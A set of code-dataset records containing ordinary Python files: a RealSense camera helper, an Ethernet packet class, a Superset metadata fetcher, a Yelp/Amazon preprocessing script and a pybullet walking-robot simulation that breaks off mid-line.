+{"seq_id":"356800585","text":"\"\"\"\r\nthis file contains a custom class for the intelrealsense\r\n\"\"\"\r\n\r\nimport pyrealsense2 as rs\r\nimport numpy as np\r\nimport cv2 as cv\r\n\r\n\r\nclass MyRealsense:\r\n def __init__(self):\r\n # pipeline class object\r\n self.pipeline = rs.pipeline()\r\n # configuration\r\n self.class_config = rs.config()\r\n\r\n # default configurations\r\n self.width = 640\r\n self.height = 480\r\n self.frame_rate = 30\r\n\r\n\r\n def MyRealsense_configure(self):\r\n try:\r\n # update configurations\r\n self.class_config.enable_stream(rs.stream.depth, self.width, self.height, rs.format.z16, self.frame_rate)\r\n self.class_config.enable_stream(rs.stream.color, self.width, self.height, rs.format.bgr8, self.frame_rate)\r\n return True\r\n except:\r\n return False\r\n\r\n def MyRealsense_start_pipe(self):\r\n try:\r\n self.pipeline.start(self.class_config)\r\n return True\r\n except:\r\n return False\r\n\r\n def MyRealsense_wait_for_lense(self, num_frames):\r\n try:\r\n for x in range(num_frames):\r\n self.pipeline.wait_for_frames()\r\n return True\r\n except:\r\n return False\r\n\r\n def MyRealsense_stop_pipe(self):\r\n try:\r\n self.pipeline.stop()\r\n return True\r\n except:\r\n return False\r\n\r\n def MyRealsense_get_color_frame(self):\r\n try:\r\n frameset = self.pipeline.wait_for_frames()\r\n color_frame = frameset.get_color_frame()\r\n # convert to np array\r\n color_image = np.asanyarray(color_frame.get_data())\r\n return color_image\r\n except:\r\n print(' -> COULD NOT GET COLOR FRAME')\r\n\r\n def MyRealsense_get_depth_frame(self):\r\n try:\r\n frameset = self.pipeline.wait_for_frames()\r\n depth_frame = frameset.get_depth_frame()\r\n # convert to np array\r\n depth_image = np.asanyarray(depth_frame.get_data())\r\n return depth_image\r\n except:\r\n print(' -> COULD NOT GET DEPTH FRAME')\r\n\r\n def MyRealsense_filter_depth(self, src, val, thresh):\r\n try:\r\n # grab boundries\r\n val_low = val[0] - thresh[0]\r\n if val_low <= 0:\r\n val_low = 0\r\n val_high = val[0] + thresh[0]\r\n\r\n return cv.inRange(src, val_low, val_high)\r\n except:\r\n print(' -> COULD NOT FILTER DEPTH')\r\n\r\n def MyRealsense_filter_hsv(self, src, val, thresh):\r\n try:\r\n val_low = [val[0]-thresh[0], val[1]-thresh[1], val[2]-thresh[2]]\r\n if val_low[0] < 0:\r\n val_low[0] = 0\r\n if val_low[1] < 0:\r\n val_low[1] = 0\r\n if val_low[2] < 0:\r\n val_low[2] = 0\r\n val_high = [val[0] + thresh[0], val[1] + thresh[1], val[2] + thresh[2]]\r\n if val_high[0] > 179:\r\n val_high[0] = 179\r\n if val_high[1] > 255:\r\n val_high[1] = 255\r\n if val_high[2] > 255:\r\n val_high[2] = 255\r\n # create bounds\r\n bound_low = np.array(val_low)\r\n bound_high = np.array(val_high)\r\n\r\n return cv.inRange(src, bound_low, bound_high)\r\n except:\r\n print(' -> COULD NOT FILTER HSV')\r\n\r\n\r\n def MyRealsense_erode_frame(self, src, iterations):\r\n return cv.erode(src, None, iterations=iterations)\r\n\r\n\r\n def MyRealsense_dilate_frame(selfself, src, iterations):\r\n return cv.dilate(src, None, iterations=iterations)\r\n\r\n","sub_path":"helper_rs.py","file_name":"helper_rs.py","file_ext":"py","file_size_in_byte":3639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"429845846","text":"import logging\nimport struct\n\nfrom nally.config import config\nfrom nally.core.layers.inet.ip.ip_packet import IpPacket\nfrom nally.core.layers.link.arp.arp_packet import ArpPacket\nfrom nally.core.layers.link.proto_type import EtherType\nfrom nally.core.layers.link.ethernet.ethernet_utils import EthernetUtils\nfrom nally.core.layers.packet import Packet\n\n\nclass EthernetPacket(Packet):\n \"\"\"\n Represents Ethernet II (DIX Ethernet) frame\n \"\"\"\n\n ETHERNET_HEADER_LENGTH_BYTES = 14\n\n ETHERNET_PACKET_FORMAT = \"!6s6sH\"\n \"\"\"\n Ethernet packet format, includes 12 bytes for source and\n destination MAC addresses and also 2 bytes for EtherType/length field\n \"\"\"\n\n INTERNET_LAYER_CONVERTERS = {\n EtherType.IPV4: IpPacket.from_bytes,\n EtherType.ARP: ArpPacket.from_bytes\n }\n \"\"\"\n Defines converters to the Internet layer packets based on the value of\n EtherType field in Ethernet frame\n \"\"\"\n\n LOG = logging.getLogger(\"EthernetPacket\")\n\n def __init__(\n self,\n dest_mac: str,\n source_mac: str = config.interface_mac,\n ether_type: EtherType = EtherType.IPV4,\n ):\n \"\"\"\n Initializes Ethernet frame instance\n\n :param dest_mac: destination MAC address, could be either a byte array\n or hexadecimal string\n :param source_mac: source MAC address, could be either a byte array or\n hexadecimal string, if not specified, then local MAC will be\n picked up\n :param ether_type: can either be a 2 bytes number which specifies\n payload size in bytes or EtherType instance which indicates which\n protocol is encapsulated in the payload of the frame\n \"\"\"\n super().__init__()\n self.__dest_mac = EthernetUtils.validate_mac(dest_mac)\n self.__source_mac = EthernetUtils.validate_mac(source_mac)\n self.__ether_type = EthernetUtils.validate_ether_type(ether_type)\n\n def to_bytes(self):\n header = struct.pack(\n self.ETHERNET_PACKET_FORMAT,\n self.__dest_mac,\n self.__source_mac,\n self.__ether_type,\n )\n return header + EthernetUtils.validate_payload(self.raw_payload)\n\n @staticmethod\n def from_bytes(bytes_packet: bytes):\n header_bytes = bytes_packet[:EthernetPacket.ETHERNET_HEADER_LENGTH_BYTES] # noqa E501\n payload_bytes = EthernetUtils.validate_payload(\n bytes_packet[EthernetPacket.ETHERNET_HEADER_LENGTH_BYTES:]\n )\n packet_fields = struct.unpack(\n EthernetPacket.ETHERNET_PACKET_FORMAT,\n header_bytes\n )\n dest_mac = packet_fields[0]\n source_mac = packet_fields[1]\n ether_type = packet_fields[2]\n ethernet_packet = EthernetPacket(dest_mac, source_mac, ether_type)\n if len(payload_bytes) == 0:\n return ethernet_packet\n # try to find appropriate converter based on EtherType field\n internet_layer_converter = EthernetPacket \\\n .INTERNET_LAYER_CONVERTERS \\\n .get(ether_type)\n if internet_layer_converter is None:\n EthernetPacket.LOG.warning(\n f\"Can't find converter to internet layer packet. \"\n f\"EtherType: {ether_type}. \"\n f\"Payload: {payload_bytes.hex()}\"\n )\n return ethernet_packet\n internet_layer = internet_layer_converter(payload_bytes)\n return ethernet_packet / internet_layer\n\n def is_response(self, packet: Packet) -> bool:\n if EthernetPacket not in packet:\n return False\n ethernet_layer: EthernetPacket = packet[EthernetPacket]\n # check EtherType field\n if self.ether_type != ethernet_layer.ether_type:\n return False\n # here we know that 'self' is a valid response on Ethernet layer,\n # now delegate further processing to the upper layer if one exists\n return (\n self.upper_layer.is_response(packet)\n if self.upper_layer is not None\n else True\n )\n\n @property\n def dest_mac(self):\n return self.__dest_mac\n\n @property\n def source_mac(self):\n return self.__source_mac\n\n @property\n def ether_type(self):\n return self.__ether_type\n\n def __eq__(self, other: object) -> bool:\n if isinstance(other, EthernetPacket):\n return self.source_mac == other.source_mac and \\\n self.dest_mac == other.dest_mac and \\\n self.ether_type == other.ether_type and \\\n self.upper_layer == other.upper_layer\n return False\n\n def __str__(self) -> str:\n dest_mac = self.dest_mac.hex()\n src_mac = self.source_mac.hex()\n ether_type = hex(self.ether_type)\n ether_type_name = (\n self.ether_type.name\n if isinstance(self.ether_type, EtherType)\n else \"length\"\n )\n return f\"Ethernet(dest_mac={dest_mac}, \" \\\n f\"src_mac={src_mac}, \" \\\n f\"ether_type={ether_type} ({ether_type_name})) \"\n","sub_path":"nally/core/layers/link/ethernet/ethernet_packet.py","file_name":"ethernet_packet.py","file_ext":"py","file_size_in_byte":5118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"199242027","text":"# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n# pylint: disable=C,R,W\n\nimport json\n\nimport requests\n\nfrom superset.yoyi.utils import utils\n\nclass metadata:\n\n @classmethod\n def get_metadata_from_bi(self, bi_url, data):\n \"\"\"\n 从BI获取元数据\n :param data:\n :return:\n \"\"\"\n url = \"{}/bi/getMetadataByType?type=1&logicType=bi\".format(bi_url)\n request = requests.get(url=url)\n obj = json.loads(request.content, encoding=\"utf-8\")\n return self.build_metadata(obj, form_data=data)\n\n @staticmethod\n def build_metadata(metadata, form_data):\n all = []\n dims = []\n metrics_combo = []\n columns = []\n metrics = []\n verbose = {}\n order_by_choices = []\n for item in metadata:\n fieldName = item[\"fieldName\"]\n displayName = item[\"displayName\"]\n logicCategory = item[\"logicCategory\"]\n dataType = item[\"dataType\"]\n\n temp = [fieldName, displayName]\n verbose[fieldName] = displayName\n all.append(temp)\n order_by_choices.append((json.dumps([fieldName, True]), \"{} 正序\".format(displayName)))\n order_by_choices.append((json.dumps([fieldName, False]), \"{} 倒序\".format(displayName)))\n\n if logicCategory == \"dimension\":\n dims.append(temp)\n desc = {\n \"type\": dataType,\n \"dimension\": fieldName,\n \"outputName\": fieldName,\n \"outputType\": dataType\n }\n columns.append({\n \"column_name\": fieldName,\n \"verbose_name\": displayName,\n \"description\": displayName,\n \"expression\": json.dumps(desc),\n \"filterable\": True,\n \"groupby\": True,\n \"is_dttm\": None if fieldName != \"bizdate\" else True,\n \"type\": None\n })\n elif logicCategory == \"metric\":\n metrics_combo.append(temp)\n desc = {\n \"type\": \"longSum\",\n \"name\": fieldName,\n \"fieldName\": fieldName\n }\n metrics.append({\n \"metric_name\": fieldName,\n \"verbose_name\": displayName,\n \"description\": displayName,\n \"expression\": json.dumps(desc),\n \"warning_text\": \"\",\n \"d3format\": \"\"\n })\n form_data[\"all_cols\"] = all\n form_data[\"filterable_cols\"] = dims\n form_data[\"gb_cols\"] = dims\n form_data[\"metrics_combo\"] = metrics_combo\n form_data[\"name\"] = utils.get_table_name()\n form_data[\"datasource_name\"] = utils.get_table_name()\n form_data[\"columns\"] = columns\n form_data[\"metrics\"] = metrics\n form_data[\"verbose_map\"] = verbose\n form_data[\"order_by_choices\"] = order_by_choices\n return form_data\n","sub_path":"superset/yoyi/metadata.py","file_name":"metadata.py","file_ext":"py","file_size_in_byte":3815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"296498058","text":"import re\nimport json\nimport glob\nimport math\nimport html\nimport itertools\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\n\nimport lxml.html\nimport lxml.html.clean\n\nfrom sklearn.cluster import KMeans\nfrom sklearn.metrics import silhouette_score\n\nYELP_BIN_COLS = ['BikeParking', 'BusinessAcceptsCreditCards', 'ByAppointmentOnly', 'Caters', 'GoodForKids', 'HasTV', 'OutdoorSeating',\n 'RestaurantsDelivery', 'RestaurantsGoodForGroups', 'RestaurantsReservations', 'RestaurantsTakeOut', 'WheelchairAccessible',\n 'Ambience_casual', 'Ambience_classy', 'Ambience_divey', 'Ambience_hipster', 'Ambience_intimate', \n 'Ambience_romantic', 'Ambience_touristy', 'Ambience_trendy', 'Ambience_upscale', \n 'BusinessParking_garage', 'BusinessParking_lot', 'BusinessParking_street', 'BusinessParking_valet', 'BusinessParking_validated', \n 'GoodForMeal_breakfast', 'GoodForMeal_brunch', 'GoodForMeal_dessert', 'GoodForMeal_dinner', 'GoodForMeal_latenight', 'GoodForMeal_lunch']\nYELP_STR_COLS = ['business_id', 'name', 'categories', 'NoiseLevel', 'Alcohol', 'RestaurantsAttire', 'WiFi', 'RestaurantsPriceRange2']\n\nYELP_FIELDS = ['group_id', 'name', 'category', 'noise level', 'alcohol', 'restaurants attire', 'wifi', 'restaurants price range', 'bike parking', \n 'accept credit cards', 'by appointment only', 'cater', 'good for kids', 'has tv', 'outdoor seating', 'restaurants delivery', \n 'restaurants good for group', 'restaurants reservations', 'restaurants take out', 'wheelchair accessible', 'ambience casual', \n 'ambience classy', 'ambience divey', 'ambience hipster', 'ambience intimate', 'ambience romantic', 'ambience touristy', 'ambience trendy',\n 'ambience upscale', 'parking garage', 'parking lot', 'parking street', 'parking valet', 'parking validated', 'good for meal breakfast',\n 'good for meal brunch', 'good for meal dessert', 'good for meal dinner', 'good for meal latenight', 'good for meal lunch', \n 'ratings', 'hours monday', 'hours tuesday', 'hours wednesday', 'hours thursday', 'hours friday', 'hours saturday', 'hours sunday']\n\nAMAZON_CATEGORIES = ['Clothing_Shoes_and_Jewelry', 'Electronics', 'Health_and_Personal_Care', 'Home_and_Kitchen']\n\ndef _basic_str_preprocessing(x):\n if type(x) == str:\n if x.startswith(\"u'\") and x.endswith(\"'\"):\n x = x[1:]\n if x.startswith(\"'\") and x.endswith(\"'\"):\n x = x[1:-1]\n if x == 'None':\n x = None\n return x\n\ndef _to_binary(x, max_len, rounding=True):\n if rounding:\n x = round(x * 2.0) / 2.0\n p_float, p_integer = math.modf(x)\n b_integer = bin(int(p_integer))[2:]\n b_float = bin(math.ceil(p_float))[2:]\n binary = b_integer + b_float\n return '0' * (max_len-len(binary)) + binary\n\ndef _to_coordinate(hours):\n s, e = hours.split('-')\n s_h, s_m = [int(x) for x in s.split(':')]\n e_h, e_m = [int(x) for x in e.split(':')]\n\n s = float(s_h + s_m / 60.)\n e = float(e_h + e_m / 60.)\n\n if s >= e:\n e = e + 24.\n return [s, e]\n\ndef _clean_html(html):\n html = re.sub('\\[if gte mso 9\\][\\s\\S]+\\[endif\\]', ' ', html)\n html = re.sub('&[amp;]+lt;[\\s\\S]+&[amp;]+gt;', ' ', html)\n html = re.sub('.caption \\{[\\s\\S]+\\}', ' ', html)\n html = re.sub('#jl_box\\{[\\s\\S]+\\}', ' ', html)\n html = re.sub('#review[\\s\\S]+\\}', ' ', html)\n html = re.sub('.productDescriptionWrapper table\\{[\\s\\S]+\\}', ' ', html)\n html = re.sub('#productDescription \\{[\\s\\S]+\\}', ' ', html)\n html = re.sub('DOCTYPE html PUBLIC[\\s\\S]+\\}', ' ', html)\n html = re.sub('A\\+[\\s\\S]+\\}', ' ', html)\n html = re.sub('[\\S]+[\\s]?\\{[\\s\\S]+\\}', ' ', html)\n html = re.sub('\\\\xa0', ' ', html)\n html = re.sub('\\s+', ' ', html)\n if html in ['', ' ']:\n return ''\n else:\n doc = lxml.html.fromstring(html)\n cleaner = lxml.html.clean.Cleaner(style=True)\n doc = cleaner.clean_html(doc)\n text = doc.text_content()\n text = text.replace('\\xa0', ' ')\n text = re.sub('<.*?>', ' ', text)\n text = re.sub('\\s+', ' ', text)\n if text == ' ':\n return ''\n else:\n return text\n\ndef _make_field(x, raw_field, new_field, null_value, processing_function):\n if raw_field not in x:\n x[new_field] = null_value\n else:\n x[new_field] = processing_function(x.pop(raw_field))\n return x\n\ndef _yelp_table_preprocessing():\n # Load meta\n json_list = []\n f = open('data/yelp/raw_others/business.json', 'r', encoding='utf-8')\n for line in f.readlines():\n json_ = json.loads(line)\n json_list.append(json_)\n\n # Process meta\n all_attributes = sorted(set(itertools.chain(*[list(x['attributes'].keys()) \n if x['attributes'] != None else [] for x in json_list])))\n all_hours = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday']\n\n processed_list = []\n for raw in json_list:\n processed = {\n 'business_id' : raw['business_id'],\n 'name' : raw['name'],\n 'stars' : raw['stars'],\n 'categories' : raw['categories']\n }\n for attributes in all_attributes:\n processed[attributes] = None\n if raw['attributes']:\n if attributes in raw['attributes']:\n processed[attributes] = raw['attributes'][attributes]\n for hours in all_hours:\n processed['hours_%s' % hours] = None\n if raw['hours']:\n if hours in raw['hours']:\n processed['hours_%s' % hours] = raw['hours'][hours]\n processed_list.append(processed)\n\n df = pd.DataFrame(processed_list)\n\n # Basic str preprocessing\n for col in df.columns:\n temp = df[col]\n df[col] = temp.apply(_basic_str_preprocessing)\n\n # Feature selection based on null ratio\n col_stats = df.notnull().sum(axis=0) / len(df)\n net_cols = col_stats[col_stats >= 0.1].keys()\n df = df[net_cols]\n\n # Hierarchical feature processing\n hier_keys = dict()\n for col in df.columns[2:]:\n temp = df[col]\n dict_temp = temp[temp.apply(lambda x : type(x) == str and '{' in x)]\n if len(dict_temp) != 0:\n hier_keys[col] = sorted(set(list(itertools.chain(*dict_temp.apply(lambda x : list(eval(x).keys()))))))\n\n for key in hier_keys.keys():\n def _dict_to_list(x, values):\n result = []\n x = eval(x)\n for val in values:\n if val in x:\n result.append(x[val])\n else:\n result.append(None)\n return result\n\n temp = df[key]\n values = hier_keys[key]\n\n temp = temp.apply(lambda x : [None] * len(values) if x == None else _dict_to_list(x, values))\n df_temp = pd.DataFrame(list(temp), columns=['%s_%s' % (key, val) for val in values])\n\n df.pop(key)\n df = pd.concat([df, df_temp], axis=1)\n\n # Fill null\n df.fillna('', inplace=True)\n\n # Erase _ in string\n df['NoiseLevel'] = df['NoiseLevel'].apply(lambda x : x.replace('_', ' ') if '_' in x else x)\n df['Alcohol'] = df['Alcohol'].apply(lambda x : x.replace('_', ' ') if '_' in x else x)\n\n # Categories processing\n categories_len = df.categories.apply(lambda x : len(x.split(', ')))\n categories_len_threshold = np.percentile(categories_len, 90)\n df['categories'] = df.categories.apply(lambda x : ', '.join(x.split(', ')[:int(categories_len_threshold-1)]))\n\n # Hours processing\n hours_columns = [x for x in df.columns if 'hours' in x]\n all_hours = pd.Series(list(itertools.chain(*[list(df[x][df[x] != '']) for x in hours_columns])))\n all_hours_val = all_hours.value_counts()\n\n for i in range(len(all_hours_val)):\n set_hours_val = all_hours_val[all_hours_val >= i]\n ratio = sum(set_hours_val) / len(all_hours)\n if ratio < 0.9:\n break\n\n set_hours_val = all_hours_val[all_hours_val >= i]\n set_hours = pd.Series(list(set_hours_val.index))\n X = np.array(list(set_hours.apply(_to_coordinate)))\n\n cluster_list = [3, 4, 5, 7, 10]\n score_list = []\n for cluster in cluster_list:\n kmeans = KMeans(n_clusters=cluster, random_state=0).fit(X)\n y = kmeans.fit_predict(X)\n score = silhouette_score(X, y)\n score_list.append(score)\n\n best_cluster = cluster_list[np.argmax(score_list)]\n kmeans = KMeans(n_clusters=best_cluster, random_state=0).fit(X)\n\n # Binary type processing (to str type)\n for col in YELP_BIN_COLS:\n temp = df[col]\n temp = temp.apply(lambda x : 'true' if x in [1.0, 1, True, 'True'] else x)\n temp = temp.apply(lambda x : 'false' if x in [0.0, 0, False, 'False'] else x)\n df[col] = temp\n\n # Ordinary type processing (to str type)\n price_dict = {\n '1' : 'cheap',\n '2' : 'average',\n '3' : 'expensive',\n '4' : 'very expensive',\n }\n df['RestaurantsPriceRange2'] = df.RestaurantsPriceRange2.apply(lambda x : price_dict[x] if x != '' else x)\n\n # String type features\n df_str = df[YELP_STR_COLS + YELP_BIN_COLS]\n\n # Numeric type processing\n df_num = pd.DataFrame(df['stars'].apply(lambda x : _to_binary(x, 4, False)))\n\n # Categorical type processing\n df_categorical = []\n for col in hours_columns:\n temp = df[col].apply(lambda x : _to_coordinate(x) if x != '' else x)\n temp_notnull = temp[temp != '']\n temp[temp != ''] = pd.Series([str(x) for x in list(kmeans.predict(np.array(list(temp_notnull))))], index=temp_notnull.index)\n df_categorical.append(temp)\n df_categorical = pd.concat(df_categorical, axis=1)\n\n # Get meta\n meta = pd.concat([df_str, df_num, df_categorical], axis=1)\n meta.columns = YELP_FIELDS\n\n # Select essential meta\n train_file_list = glob.glob('data/yelp/5.text/train/*')\n val_file_list = glob.glob('data/yelp/5.text/val/*')\n test_file = pd.read_csv('data/yelp/test/summaries_0-200_cleaned.csv', encoding='utf-8')\n\n train_group_id_list = [x.split('/')[-1][:-4] for x in train_file_list] \n val_group_id_list = [x.split('/')[-1][:-4] for x in val_file_list]\n test_group_id_list = [x for x in test_file['Input.business_id'] if type(x) == str]\n\n meta.index = meta.group_id\n set_meta = meta.loc[sorted(set(train_group_id_list + val_group_id_list + test_group_id_list))]\n\n # Save meta\n set_meta.to_csv('data/yelp/meta.csv', sep='\\t', encoding='utf-8', index=False)\n\n\ndef _amazon_table_preprocessing():\n # Load meta\n json_list = []\n len_list = []\n print('--load meta')\n for category in tqdm(AMAZON_CATEGORIES):\n f = open('data/amazon/raw_others/meta_%s.json' % category, 'r')\n lines = f.readlines()\n len_list.append(len(lines))\n for line in lines:\n json_list.append(eval(line))\n\n # Set max categories\n categories_threshold = int(np.percentile(pd.Series([len(x['categories']) for x in json_list]), 90))\n\n # Select essential meta\n train_group_ids = [x.split('/')[-1][:-4] for x in glob.glob('data/amazon/5.text/train/*.csv')]\n val_group_ids = [x.split('/')[-1][:-4] for x in glob.glob('data/amazon/5.text/val/*.csv')]\n test_group_ids = list(pd.read_csv('data/amazon/test/all.csv', encoding='utf-8', sep='\\t').prod_id)\n\n asin = pd.Series([x['asin'] for x in json_list])\n asin = asin[asin.drop_duplicates().index]\n asin = asin.reset_index()\n asin.index = asin[0]\n asin = asin.loc[train_group_ids + val_group_ids + test_group_ids]\n\n net_index_list = list(asin['index'])\n net_json_list = [json_list[i] for i in net_index_list]\n\n # Process meta\n print('--process meta')\n for x in tqdm(net_json_list):\n # asin\n x['group_id'] = x.pop('asin')\n # categories\n x['category'] = \"||\".join([\"|\".join(y) for y in x.pop('categories')[:categories_threshold]])\n\n # brand\n x = _make_field(x, 'brand', 'brand', '', lambda y : html.unescape(y))\n # description\n x = _make_field(x, 'description', 'description', '', lambda y : _clean_html(y))\n # imUrl\n x = _make_field(x, 'imUrl', 'imUrl', '', lambda y : y if y.startswith('http://ecx') else '')\n # price\n x = _make_field(x, 'price', 'price', _to_binary(0.0, 11), lambda y : _to_binary(float(y), 11))\n # title\n x = _make_field(x, 'title', 'name', '', lambda y : html.unescape(y))\n\n # related & salesRank\n if 'related' in x:\n x.pop('related')\n if 'salesRank' in x:\n x.pop('salesRank')\n\n # ratings\n df = None\n for category in AMAZON_CATEGORIES:\n try:\n with open('data/amazon/1.prep/%s/%s.csv' % (category, x['group_id']), \n encoding='utf-8', mode='r') as f:\n lines = f.readlines()[1:]\n df = pd.DataFrame([x.strip().split('\\t') for x in lines], \n columns=['group_id', 'review_text', 'rating', 'category'])\n break\n except FileNotFoundError:\n df = None\n\n if df is not None:\n x['ratings'] = _to_binary(df.rating.apply(float).mean(), 4)\n else:\n x['ratings'] = ''\n\n # Save meta\n set_meta = pd.DataFrame(net_json_list)[['group_id', 'price', ' ratings', 'brand', 'name', 'category', 'description']]\n set_meta.to_csv('data/amazon/meta.csv', sep='\\t', encoding='utf-8', index=False)\n\ndef preprocessing(dataset):\n print('Table modality preprocessing: %s' % dataset)\n if dataset == 'yelp':\n _yelp_table_preprocessing()\n elif dataset == 'amazon':\n _amazon_table_preprocessing()\n","sub_path":"multimodal_preprocessing/table_modality_preprocessing.py","file_name":"table_modality_preprocessing.py","file_ext":"py","file_size_in_byte":13826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"224913631","text":"#passive dynamic walking\n\nimport pybullet as p\nimport time\nimport pybullet_data\nimport math\n\nPI = math.pi\n\ndef getcontact(robotid, planeid, linkindex):\n #get contact infomation\n coninfo = p.getContactPoints(robotid, planeid, linkindex)\n #print('contact infomation')\n #print(coninfo)\n\n coninfolen = len(coninfo)\n #contact -> 1, no contact -> 0\n conflag = 0\n if coninfolen != 0:\n if coninfo[0][0] == 0:\n #print('contact!')\n conflag = 1\n #else:\n #print('no contct..')\n\n return conflag\n\nphysicsClient = p.connect(p.GUI)#or p.DIRECT for non-graphical version \np.setAdditionalSearchPath(pybullet_data.getDataPath()) #optionally \n#set Gravity\np.setGravity(0,0,-9.8)\n#load plane URDF\nplaneId = p.loadURDF(\"plane.urdf\")\n#initial position of a robot\ncubeStartPos = [0,0,0.9]\n#initial orientation of a robot\ncubeStartOrientation = p.getQuaternionFromEuler([0,0,0])\n#load a robot\nrobotId = p.loadURDF(\"urdf/test_walker1-2.urdf\", cubeStartPos, cubeStartOrientation)\n\n#CONTROL MODE\npmode = p.POSITION_CONTROL\nvmode = p.VELOCITY_CONTROL\ntmode = p.TORQUE_CONTROL\n\n\nsimpara = p.getPhysicsEngineParameters(physicsClient)\nprint('simulation parameters')\nprint(simpara)\n\n#joint indices\njointIndex = {\"outer_hip_joint1\":0, \"outer_knee_joint1\":1, \"inner_hip_joint1\":2, \"inner_knee_joint1\":3, \"inner_hip_joint2\":4, \"inner_knee_joint2\":5, \"outer_hip_joint2\":6, \"outer_knee_joint2\":7}\n\n#link indices\nlinkIndex = {\"outer_thigh1\":0, \"outer_shin1\":1, \"inner_thigh1\":2, \"inner_shin1\":3, \"inner_thigh2\":4, \"inner_shin2\":5, \"outer_thigh2\":6, \"outer_shin2\":7}\n\n#joint indices list\nouter_hip_joints = [jointIndex[\"outer_hip_joint1\"], jointIndex[\"outer_hip_joint2\"]]\nouter_knee_joints = [jointIndex[\"outer_knee_joint1\"], jointIndex[\"outer_knee_joint2\"]]\ninner_hip_joints = [jointIndex[\"inner_hip_joint1\"], jointIndex[\"inner_hip_joint2\"]]\ninner_knee_joints = [jointIndex[\"inner_knee_joint1\"], jointIndex[\"inner_knee_joint2\"]]\n\n#Initial Position of hips\n#hip joints move using setJointMotorControl2\np.setJointMotorControl2(robotId, jointIndex[\"outer_hip_joint1\"], controlMode=pmode, targetPosition=PI / 9)\np.setJointMotorControl2(robotId, jointIndex[\"outer_hip_joint2\"], controlMode=pmode, targetPosition=PI / 9)\np.setJointMotorControl2(robotId, jointIndex[\"inner_hip_joint1\"], controlMode=pmode, targetPosition=-1 * PI / 9)\np.setJointMotorControl2(robotId, jointIndex[\"inner_hip_joint2\"], controlMode=pmode, targetPosition=-1 * PI / 9)\n \n#Initial Position of knees\n#knee joints move using setJointMotorControlArray\n#p.setJointMotorControlArray(robotId, outer_knee_joints, controlMode=pmode, targetPositions=[PI / 7, PI / 7]) \n#p.setJointMotorControlArray(robotId, inner_knee_joints, controlMode=pmode, targetPositions=[PI / 3, PI / 3])\np.setJointMotorControlArray(robotId, outer_knee_joints, controlMode=pmode, targetPositions=[0, 0]) \np.setJointMotorControlArray(robotId, inner_knee_joints, controlMode=pmode, targetPositions=[PI / 36, PI / 36])\n\n#phase1 -> outer legs are swinging\n#phase2 -> inner legs are swinging\nphase = 1\n\ncount = 0\n#inner_hipangle = -1 * PI / 12\n#inner_kneeangle = 0\n#outer_hipangle = PI * 5 / 36\n#outer_kneeangle = 0\n\nic_hip_angle = PI / 9\nic_knee_angle = PI / 36\nlr_knee_angle = PI / 12\ntst_hip_angle = -1 * PI / 9\ntst_knee_angle = PI / 36\nknee_angle_zero = 0 \n\nswing_hipangle = ic_hip_angle\nswing_kneeangle = ic_knee_angle\nsupport_hipangle = tst_hip_angle\nsupport_kneeangle = tst_knee_angle\n\nsleeptime = 500\n#swhiptime = 560\nswhiptime = 560\n#swkneetime = 570\nswkneetime = 590\n#suhiptime = 515\nsuhiptime = 515\nsukneetime = 540\n\nswkneemovetime = (swkneetime - sleeptime) * 0.8\nsukneemovetime = ((sukneetime - sleeptime) * 0.8) / 2 #this time is CW time and CCW time -> /2.0\n\nsw_zero_to_five_time = (swkneetime - (sleeptime + swkneemovetime)) * 0.5\nsu_zero_to_five_time = (sukneetime - (sleeptime + sukneemovetime + sukneemovetime)) * 0.2\nsu_mid_time = (sukneetime - su_zero_to_five_time) - (sleeptime + sukneemovetime * 2)\n\npa_or_con_flag = 1\n\n#simulation start -> simflag = 1\nsimflag = 0\n\nwhile True:\n count = count + 1\n \n #get contact infomation\n conflag_outer_shin1 = getcontact(robotId, planeId, linkIndex[\"outer_shin1\"])\n conflag_outer_shin2 = getcontact(robotId, planeId, linkIndex[\"outer_shin2\"])\n conflag_inner_shin1 = getcontact(robotId, planeId, linkIndex[\"inner_shin1\"])\n conflag_inner_shin2 = getcontact(robotId, planeId, linkIndex[\"inner_shin2\"])\n \n #attach the bottun to feet\n #if conflag_outer_shin1 == 1:\n #print(\"outer shin1 contact!\")\n #if conflag_outer_shin2 == 1:\n #print(\"outer shin2 contact!\")\n #else:\n #print(\"outer shin2 no contact\")\n #if conflag_inner_shin1 == 1:\n #print(\"inner shin1 contact!\")\n #else:\n #print(\"inner shin1 no contact\")\n #if conflag_inner_shin2 == 1:\n #print(\"inner shin2 contact!\")\n #else:\n #print(\"inner shin2 no contact\")\n \n #check! if swing leg's feet contact ground, it would say OUT!\n #if (simflag == 1) and ((phase == 1 and conflag_outer_shin1 == 1) or (phase == 1 and conflag_outer_shin2 == 1)):\n #print(\"OUT!!\")\n\n if conflag_outer_shin1 == 1 and conflag_outer_shin2 == 1:\n outer_conflag = 1\n else:\n outer_conflag = 0\n\n if conflag_inner_shin1 == 1 and conflag_inner_shin2 == 1:\n inner_conflag = 1\n else:\n inner_conflag = 0\n\n #move angle / max count -> changing by average speed\n #swing legs\n #hip tst_hip_angle -> ic_hip_angle\n if count >= sleeptime and count <= swhiptime:\n swing_hipangle = swing_hipangle - PI * 2 / 9 / (swhiptime - sleeptime)\n #knee\n if count >= sleeptime and count <= swkneetime:\n if count <= sleeptime + 2:\n pa_or_con_flag = 1\n swing_kneeangle = ic_knee_angle\n #free joint\n elif count > sleeptime + 2 and count <= sleeptime + swkneemovetime:\n #swing_kneeangle = swing_kneeangle + PI / 3 / swkneemovetime\n pa_or_con_flag = 0\n print(count)\n # -> 0\n elif count > sleeptime + swkneemovetime and count <= 